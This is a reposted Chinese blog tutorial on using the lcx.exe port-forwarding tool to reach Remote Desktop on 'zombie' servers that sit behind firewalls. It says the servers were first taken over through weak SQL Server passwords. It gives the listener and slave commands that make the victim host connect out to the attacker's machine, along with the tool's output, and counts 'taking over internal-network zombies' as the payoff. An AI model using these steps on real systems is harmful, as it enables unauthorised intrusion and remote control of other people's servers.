转帖:利用LCX穿越防火墙

  以前抓肉鸡都是通过1433弱口令,然后……
  但是发现很多服务器开了1433、3389,但是终端连不上。因为服务器本身是在内网,只对外开放了1433端口,幸好有lcx.exe这个东西,用sqltools.exe传倒服务器上……
  lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP。这样链接B机的3389端口就相当于链接A机的3389。

  例如:在本地控制机B上监听 -listen 51 3389,在肉鸡A上运行-slave B的IP地址 51 A的IP地址 3389,那么在本地控制机B连127.0.0.1就可以连肉鸡A的3389。注:第二条是将本地控制机B的51端口的数据转向3389端口。
 
  首先在本地控制机B的cmd下运行lcx.exe -listen 51 3389,意思是监听51端口并转发到3389端口。
  显示如下:[+] Listening port 51 ......
  [+] Listen OK!
  [+] Listening port 3389 ......
  [+] Listen OK!
  [+] Waiting for Client on port:51 ......
 
  然后在肉鸡A上运行 lcx.exe -slave [本地控制机B的IP] 51 [肉鸡A的IP] 3389
  运行以后本地控制机B监听端口就会收到信息.[+] Listening port 51 ......
  [+] Listen OK!
  [+] Listening port 3389 ......
  [+] Listen OK!
  [+] Waiting for Client on port:51 ......
  [+] Accept a Client on port 51 from [肉鸡A的IP] ......
  [+] Waiting another Client on port:3389....
  好了.现在在自己机子上链接 127.0.0.1 或者输入本地控制机B的IP.
  发现进去的不是自己机子,(或者自己机子根本连不上),而是肉鸡A了!
 
  优点:搞定内网肉鸡。
  缺点:有点麻烦。
 
文章转自: http://blog.nnsky.com/blog_view_75846.html?page=1,有改动。

你可能感兴趣的:(职场,it,网络安全,休闲,lcx)